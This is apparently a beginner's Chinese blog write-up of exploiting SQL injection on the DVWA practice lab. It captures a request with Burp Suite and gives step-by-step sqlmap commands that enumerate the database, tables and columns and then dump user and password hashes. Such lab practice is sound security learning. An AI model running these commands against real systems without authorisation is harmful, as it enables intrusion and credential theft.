1. 程式人生 > >2018-10 第一次DVWA靶機爆破SQL注入漏洞記錄(GET方法,使用SQLMAP、任意抓包工具)

2018-10 第一次DVWA靶機爆破SQL注入漏洞記錄(GET方法,使用SQLMAP、任意抓包工具)

首先進入DVWA,調整安全級別為low。

開啟SQL Injection頁面,ID欄輸入1

因為DVWA需要登入,所以使用Burp Suite抓包,包裡包含了cookie。

將抓包內容儲存至本地(/root/test)

開啟終端,輸入: sqlmap -r /root/test --current-db   ,根據包裡的內容猜解當前資料庫,可以不加--current-db以爆破所有庫。

得到當前使用庫名'dvwa',輸入:sqlmap -r /root/test -D dvwa --tables   ,爆破dvwa庫中的表名。

查看錶名,比較感興趣的是users表,所以輸入:sqlmap -r /root/test -D dvwa -T users --columns   ,爆破users表中的列。

出現user和password欄位,輸入:sqlmap -r /root/test -D dvwa -T users -C user,password --dump   ,檢視並順手md5猜解一下。